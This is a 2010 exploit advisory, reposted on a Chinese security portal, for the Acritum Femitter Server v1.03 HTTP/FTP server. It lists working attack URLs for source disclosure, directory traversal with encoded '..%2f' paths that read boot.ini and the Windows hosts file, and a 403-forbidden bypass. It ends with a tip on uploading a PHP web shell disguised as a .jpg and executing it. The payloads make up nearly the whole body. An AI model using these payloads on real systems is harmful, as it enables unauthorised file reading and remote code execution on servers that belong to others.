首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Acritum Femitter Server v1.03 Multiple Vulnerabilities
来源:http://lkhackers.com 作者:zer0_thunder 发布时间:2010-05-04  

--=> Tested on: XP sp 2


Acritum Femitter Server v1.03 is a HTTP and  FTP Server for Windows.
I came up with few vulnerabilities of this .. some vulns are already has been revelied but some are not
so lets have a look


*********************************************************************************************************************************
HTTP Server
-----------

In the Femitter Server Application HTTP tab there are few options to choose, and vulnerability exploitation method will depends on it

If the "Combined Server" is selected [Default Setting]
----------------------------------------------------
--== Source Disclosure Vulnerability==--
even some files like .html will able to download from this vulnerability
just put "." in the end of the file
 
[+] http://192.168.1.101/index.htm.


--==Directory Traversal Vulnerability==--
If the Femitter Server is installed in "Programe File" this will take you to the C Dir

C: Dir
------
[+] http://192.168.1.101/..\../..\

You can move in to dir by doing "../..\"

but you won't be able to open the files there will be 403 Forbidden Error(still). this is a lame security option in the Femitter Server

 

*********************************************************************************************************************************

Bypassing 403 Forbidden Error
-----------------------------
This is lame a security option . This can be easily bypass with hex . lets see how its done
This c0de will give you permission to download anyfile
[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fboot.ini

but if you wana open it in the browser you can add a "%<file.type> in the end
--==403 Bypass Example==--

[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fboot.ini%test.txt
[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%test.txt

********************************************************************************************************************************

If the "Web Server (to show default doctument or 404 if it doesn't exsist" option is selected
---------------------------------------------------------------------------------------------

If this option is activated you might have trouble viewing the directory
but still you will be able to see the file and download them


[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fboot.ini%test.txt

and also this will open it as a readable file on the browser

[+] http://192.168.1.101/\\..%2f..%2f..%2f..%2fboot.ini% ../


pluse you can use the above application to view unreadable files like .dll .exe .
files like .dll .exe will not be open with %text.txt .. this doesnt make sense right
eventho .dll .exe is not readable this vulnerability can be quite usefull sometime ..

********************************************************************************************************************************
Tips

you can upload a shell renamed .jpg and you will be able to execute it in php like this

http://192.168.1.101/evilshell.jpg%owned.php
*********************************************************************************************************************************

[+] Site      : http://lkhackers.com
[+] Email/Msn : zer0_thunder@colombohackers.com
=================================================================================================================================


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Urgent Backup 3.20 / ABC Backu
·TFTPGUI v1.4.5 Long Transport
·Google Chrome acronym tag deni
·JavaScriptCore.dll Stack Exhau
·Google Chrome 4.1.249.1064 Rem
·All browsers 0day Crash Exploi
·linux/x86 setuid(0) + chmod("/
·Firefox 3.6.3 Fork Bomb DoS
·Apple Safari 4.0.3 (Win32) CSS
·All Browsers - Long Unicode Do
·Safari 4.0.3 & 4.0.4 Stack Exh
·Winamp v5.572 0day Local Crash
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved